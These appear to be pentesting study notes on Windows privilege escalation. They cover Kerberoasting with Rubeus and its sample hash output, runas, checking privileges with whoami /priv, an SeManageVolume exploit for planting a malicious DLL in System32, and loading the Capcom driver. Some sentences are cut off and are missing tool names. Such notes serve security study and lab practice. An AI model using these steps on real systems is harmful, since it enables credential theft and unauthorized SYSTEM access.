Sometimes a way of escalating privileges is by moving laterally. We can take advantage of the same techniques and tools we would use for moving laterally to escalate our privileges.
Kerberoasting with Rubeus
If Rubeus is not installed we'll have to switch to our Windows dev box and compile via VIsual Studio. We can transfer the binary back to our Kali host then to our victim.
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : iis_service
[*] DistinguishedName : CN=iis_service,CN=Users,DC=corp,DC=com
[*] ServicePrincipalName : HTTP/web04.corp.com:80
[*] PwdLastSet : 9/7/2022 5:38:43 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\hashes.kerberoast
Another way we can check groups a user belongs to is using net user
PS C:\Users\tony> net user tony
User name tony
Full Name Nothing Stops
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/16/2023 1:57:34 PM
Password expires Never
Password changeable 6/16/2023 1:57:34 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
Runas Command
PS C:\Users\steve> runas /user:backupadmin cmd
Enter the password for backupadmin:
Attempting to start cmd as user "CLIENTWK220\backupadmin" ...
PS C:\Users\steve>
NOTE: If stuck, or unsure: ippsec.rocks is a great source to walk you through the exploitation of these token privileges.
The first thing to do when popping a Windows shell is to check the user privileges.
C:\Users\svc_mssql>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Running this exploit allows us RWX access to C:\ drive. We can create any PE or dll and execute it. To gain SYSTEM we can replace a dll with a malicious one.
Run exploit
C:\Users\svc_mssql> .\SeManageVolumeExploit.exe
Create malicious dll & replace it in C:\Windows\System32\wbem\
This allows us to load and unload malicious drivers in kernel mode. TLDR: Very bad. The common approach is to upload the "CapCom" driver as it's easy to exploit. We can download the driver to our Windows VM and compile it, then transfer it to the vulnerable machine and load the driver.
Follow this blog post here and download capcom & required files:
If we've gained access to a plaintext password, it's possible to use the command to execute commands as that user.
If we've gained access to a plaintext password, but don't have a full shell, we can use the command that's part of the. Here is an updated and new version.
Run and you will have access to C:\Windows\System32. If that doesn't work, sometimes it doesn't we can use exploit. We can build it in our devbox.
